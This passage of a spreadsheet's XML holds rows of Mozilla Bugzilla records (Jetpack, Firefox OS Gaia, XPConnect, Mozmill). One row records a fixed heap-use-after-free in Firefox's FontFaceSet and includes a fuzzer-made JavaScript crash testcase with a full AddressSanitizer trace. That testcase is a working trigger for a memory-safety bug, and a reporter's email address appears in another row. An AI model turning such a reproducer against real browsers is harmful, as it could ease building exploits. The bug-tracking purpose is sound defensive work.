          <t>2009-09-09 15:16:00 -0700</t>
        </is>
      </c>
      <c r="E1494" t="n">
        <v>1</v>
      </c>
      <c r="F1494" t="n">
        <v>1</v>
      </c>
      <c r="G1494" t="n">
        <v>6</v>
      </c>
      <c r="H1494" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1494" t="inlineStr">
        <is>
          <t>Mozilla Labs</t>
        </is>
      </c>
      <c r="J1494" t="inlineStr">
        <is>
          <t>Jetpack Prototype</t>
        </is>
      </c>
      <c r="K1494" t="inlineStr">
        <is>
          <t>0.1</t>
        </is>
      </c>
      <c r="L1494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1494" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1494" t="inlineStr"/>
      <c r="Q1494" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1494" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1494" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T1494" t="n">
        <v>1</v>
      </c>
      <c r="U1494" t="n">
        <v>0</v>
      </c>
      <c r="V1494" t="n">
        <v>8</v>
      </c>
      <c r="W1494" t="inlineStr">
        <is>
          <t>I have several add-ons that load in the status bar, including Weave, Mozilla QA Companion, Firebug, Personas, etc.
When I installed the Personal Tab Graph for Jetpack, the status bar add-ons were still visible.  After restarting Firefox, the only item on the status bar was the Personal Tab Graph.  Each missing add-on was accessible from another interface, but not visible on the tab bar.
Jetpack: 0.1.5 with Personal Tab Graph
Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
I have been able to isolate and reproduce the issue.</t>
        </is>
      </c>
      <c r="X1494" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" t="n">
        <v>883016</v>
      </c>
      <c r="B1495" t="inlineStr">
        <is>
          <t>2013-06-13 20:56:12 -0700</t>
        </is>
      </c>
      <c r="C1495" t="inlineStr">
        <is>
          <t>[Wallpaper]  The wallpaper quality is worse when setting the wallpaper in horizontal mode from gallery.</t>
        </is>
      </c>
      <c r="D1495" t="inlineStr">
        <is>
          <t>2013-06-21 17:50:25 -0700</t>
        </is>
      </c>
      <c r="E1495" t="n">
        <v>1</v>
      </c>
      <c r="F1495" t="n">
        <v>1</v>
      </c>
      <c r="G1495" t="n">
        <v>6</v>
      </c>
      <c r="H1495" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1495" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1495" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K1495" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1495" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1495" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1495" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1495" t="inlineStr">
        <is>
          <t>[TD-44061]</t>
        </is>
      </c>
      <c r="Q1495" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1495" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1495" t="inlineStr">
        <is>
          <t>1.1 QE3 (26jun)</t>
        </is>
      </c>
      <c r="T1495" t="n">
        <v>1</v>
      </c>
      <c r="U1495" t="n">
        <v>0</v>
      </c>
      <c r="V1495" t="n">
        <v>10</v>
      </c>
      <c r="W1495" t="inlineStr">
        <is>
          <t>1. Title : Wallpaper quality error
2. Precondition : Have on the sd card stored hugh quality image (Test iamge is attached)
3. Tester's Action : 
                1) Go to Gallery and open image in vertical mode - normal
                2) Set the pic as wallpaper, check it quality on home screen
                3) Go to Gallery again and open image in horizontal mode
                4) Set the pic as wallpaper (in horizontal mode), check it quality on home screen and compare to previous one (Vertical &amp; Horizontal image are attached)
4. Detailed Symptom : The image quality is worse when setting the wallpaper in horizontal mode
5. Expected : Quality should be same in both modes
6. Personal ID : jjoons79@gmail.com</t>
        </is>
      </c>
      <c r="X1495" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" t="n">
        <v>834732</v>
      </c>
      <c r="B1496" t="inlineStr">
        <is>
          <t>2013-01-25 07:57:29 -0800</t>
        </is>
      </c>
      <c r="C1496" t="inlineStr">
        <is>
          <t>Do a better job of maintaining the JS context stack</t>
        </is>
      </c>
      <c r="D1496" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:23 -0800</t>
        </is>
      </c>
      <c r="E1496" t="n">
        <v>1</v>
      </c>
      <c r="F1496" t="n">
        <v>1</v>
      </c>
      <c r="G1496" t="n">
        <v>3</v>
      </c>
      <c r="H1496" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1496" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1496" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1496" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1496" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1496" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q1496" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1496" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1496" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T1496" t="n">
        <v>1</v>
      </c>
      <c r="U1496" t="n">
        <v>0</v>
      </c>
      <c r="V1496" t="n">
        <v>54</v>
      </c>
      <c r="W1496" t="inlineStr">
        <is>
          <t>The code creates a special JSContext for the sandbox and pushes it. After evaluation, however, it begins to use the caller's cx again while the sandcx is still on the stack. There are calls to JS_Wrap*, which mean that we'll enter the XPConnect wrapper callbacks with |cx != nsContentUtils::GetCurrentJSContext()|, which is bad.
I don't believe this is a security issue, because the sandbox's cx is presumably always less privileged than its caller, so it's not a problem security-wise if we use that instead of the caller. We should nonetheless fix this.</t>
        </is>
      </c>
      <c r="X1496" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" t="n">
        <v>840487</v>
      </c>
      <c r="B1497" t="inlineStr">
        <is>
          <t>2013-02-12 05:54:06 -0800</t>
        </is>
      </c>
      <c r="C1497" t="inlineStr">
        <is>
          <t>Test failure in /restartTests/testDefaultBookmarks/test1.js because the location of the 'Getting Started' page has been changed</t>
        </is>
      </c>
      <c r="D1497" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E1497" t="n">
        <v>1</v>
      </c>
      <c r="F1497" t="n">
        <v>1</v>
      </c>
      <c r="G1497" t="n">
        <v>6</v>
      </c>
      <c r="H1497" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1497" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J1497" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K1497" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1497" t="inlineStr">
        <is>
          <t>[mozmill-test-failure][sprint2013-32]</t>
        </is>
      </c>
      <c r="Q1497" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1497" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1497" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1497" t="n">
        <v>1</v>
      </c>
      <c r="U1497" t="n">
        <v>0</v>
      </c>
      <c r="V1497" t="n">
        <v>60</v>
      </c>
      <c r="W1497" t="inlineStr">
        <is>
          <t>This happened today on all OS X platforms, with Nightly fr locale.</t>
        </is>
      </c>
      <c r="X1497" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" t="n">
        <v>1334876</v>
      </c>
      <c r="B1498" t="inlineStr">
        <is>
          <t>2017-01-29 02:42:28 -0800</t>
        </is>
      </c>
      <c r="C1498" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::FontFaceSet::DispatchLoadingFinishedEvent</t>
        </is>
      </c>
      <c r="D1498" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:28 -0700</t>
        </is>
      </c>
      <c r="E1498" t="n">
        <v>1</v>
      </c>
      <c r="F1498" t="n">
        <v>1</v>
      </c>
      <c r="G1498" t="n">
        <v>3</v>
      </c>
      <c r="H1498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1498" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1498" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K1498" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1498" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1498" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q1498" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1498" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1498" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T1498" t="n">
        <v>1</v>
      </c>
      <c r="U1498" t="n">
        <v>0</v>
      </c>
      <c r="V1498" t="n">
        <v>37</v>
      </c>
      <c r="W1498" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox.
&lt;script&gt;
function start() {
        o5=document.createElement('canvas').getContext('2d');
        o78=document.createElement('style');
        o79=document.createTextNode("@font-face{ font-family: font0; src: url('a') format('eot'");
        o78.appendChild(o79);
        document.documentElement.appendChild(o78);
        o118=document.fonts;
        o132=document.createElement('style');
        document.documentElement.appendChild(o132);
        o118.onloadingdone=fun1;
        o5.font=' smaller font0';
        o5.fillText("a",10,10);
        o221=document.createElement('iframe');
        document.documentElement.appendChild(o221);
        o264=document.createRange();
        o264.selectNode(o132);
}
function fun1() {
        try{o264.surroundContents(o79);}catch(E){}
        document.documentElement.offsetHeight;
        fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==25681==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00004a2a8 at pc 0x7f6ced5e7ee1 bp 0x7ffdb0fbae00 sp 0x7ffdb0fbadf8
READ of size 8 at 0x60d00004a2a8 thread T0 (Web Content)
    #0 0x7f6ced5e7ee0 in GetThread /home/worker/workspace/build/src/obj-firefox/dist/include/nsISupportsImpl.h:58:36
    #1 0x7f6ced5e7ee0 in AddRef /home/worker/workspace/build/src/layout/style/FontFace.cpp:98
    #2 0x7f6ced5e7ee0 in AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:37
    #3 0x7f6ced5e7ee0 in AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:391
    #4 0x7f6ced5e7ee0 in RefPtr&lt;mozilla::dom::FontFace&gt;::assign_with_AddRef(mozilla::dom::FontFace*) /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:54
    #5 0x7f6ced5e323a in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:191:5
    #6 0x7f6ced5e323a in init&lt;mozilla::dom::FontFace *&amp;&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/OwningNonNull.h:147
    #7 0x7f6ced5e323a in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/OwningNonNull.h:69
    #8 0x7f6ced5e323a in mozilla::dom::FontFaceSet::DispatchLoadingFinishedEvent(nsAString_internal const&amp;, nsTArray&lt;mozilla::dom::FontFace*&gt; const&amp;) /home/worker/workspace/build/src/layout/style/FontFaceSet.cpp:1657
    #9 0x7f6ced5d802a in mozilla::dom::FontFaceSet::CheckLoadingFinished() /home/worker/workspace/build/src/layout/style/FontFaceSet.cpp:1641:5
    #10 0x7f6ced906279 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1874:11
    #11 0x7f6ced913d75 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #12 0x7f6ced913a44 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #13 0x7f6ced915a84 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:506:9
    #14 0x7f6cee189084 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #15 0x7f6ce82aa407 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:160:20
    #16 0x7f6ce7f1ec37 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1425:16
    #17 0x7f6ce7e656d0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1781:14
    #18 0x7f6ce7e61c0c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1716:17
    #19 0x7f6ce7e64244 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1589:5
    #20 0x7f6ce7e6488e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1622:5
    #21 0x7f6ce706695b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1261:7
    #22 0x7f6ce70632b0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:394:10
    #23 0x7f6ce7e6d5df in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #24 0x7f6ce7ddf868 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #25 0x7f6ce7ddf868 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #26 0x7f6ce7ddf868 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #27 0x7f6ced23481f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #28 0x7f6cef42e4d7 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:927:12
    #29 0x7f6ce7ddf868 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #30 0x7f6ce7ddf868 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #31 0x7f6ce7ddf868 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #32 0x7f6cef42dcfd in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:759:7
    #33 0x4df933 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:115:19
    #34 0x4df933 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #35 0x7f6d0243482f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #36 0x41ba58 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba58)
0x60d00004a2a8 is located 40 bytes inside of 144-byte region [0x60d00004a280,0x60d00004a310)
freed by thread T0 (Web Content) here:
    #0 0x4b21ab in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f6ce6f0e744 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f6ce6f0e336 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f6ce6f15506 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3825:3
    #4 0x7f6ce6f14cdc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3650:9
    #5 0x7f6ce6f17d56 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4143:3
    #6 0x7f6ce9b32229 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1438:3
    #7 0x7f6ce968882d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f6ce7080be1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f6ce8849b3e in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f6ce8849b3e in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f6ce8849b3e in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f6ce885166b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f6cf0eb731c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f6cf0eb731c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #15 0x7f6cf0e9d0ae in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #16 0x7f6cf0e9d0ae in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #17 0x7f6cf0e80fa1 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #18 0x7f6cf0eb759c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #19 0x7f6cf0eb7c52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #20 0x7f6cf16ef4f2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2788:12
    #21 0x7f6ce878521f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f6cf0eb731c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f6cf0eb731c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #24 0x7f6cf0e9d0ae in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #25 0x7f6cf0e9d0ae in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #26 0x7f6cf0e80fa1 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #27 0x7f6cf0eb759c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #28 0x7f6cf0eb7c52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #29 0x7f6cf16f175d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #30 0x7f6ceafc986f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #31 0x7f6ceb8eecf7 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #32 0x7f6ceb8eecf7 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #33 0x7f6ceb8b8e6d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #34 0x7f6ceb8ba9ec in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #35 0x7f6ceb8a5433 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #36 0x7f6ceb8a8d24 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
previously allocated by thread T0 (Web Content) here:
    #0 0x4b24cb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e09ad in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f6ced5c9046 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f6ced5c9046 in mozilla::dom::FontFace::CreateForRule(nsISupports*, mozilla::dom::FontFaceSet*, nsCSSFontFaceRule*) /home/worker/workspace/build/src/layout/style/FontFace.cpp:150
    #4 0x7f6ced5db9b4 in mozilla::dom::FontFaceSet::UpdateRules(nsTArray&lt;nsFontFaceRuleContainer&gt; const&amp;) /home/worker/workspace/build/src/layout/style/FontFaceSet.cpp:718:11
    #5 0x7f6ce9a72d47 in nsIDocument::FlushUserFontSet() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12853:19
    #6 0x7f6ce9a732cf in GetUserFontSet /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12811:5
    #7 0x7f6ce9a732cf in nsIDocument::Fonts() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12909
    #8 0x7f6ceaf4e288 in mozilla::dom::DocumentBinding::get_fonts(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:5336:57
    #9 0x7f6ceb46a72d in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2849:13
    #10 0x7f6cf0eb731c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f6cf0eb731c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #12 0x7f6cf0eb88fe in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #13 0x7f6cf0eb88fe in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524
    #14 0x7f6cf0eb88fe in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:638
    #15 0x7f6cf1c5d907 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1812:16
    #16 0x7f6cf1c5d907 in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1860
    #17 0x7f6cf1c5d907 in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2089
    #18 0x7f6cf1c5d907 in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2123
    #19 0x7f6cf16eb71c in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1497:12
    #20 0x7f6cf16eb71c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2534
    #21 0x7f6ceb46244f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, bool*, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2036:10
    #22 0x7f6ceb178cdc in mozilla::dom::HTMLDocumentBinding::DOMProxyHandler::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:2111:8
    #23 0x7f6cf199460e in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:311:12
    #24 0x7f6cf0ec00ca in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1496:16
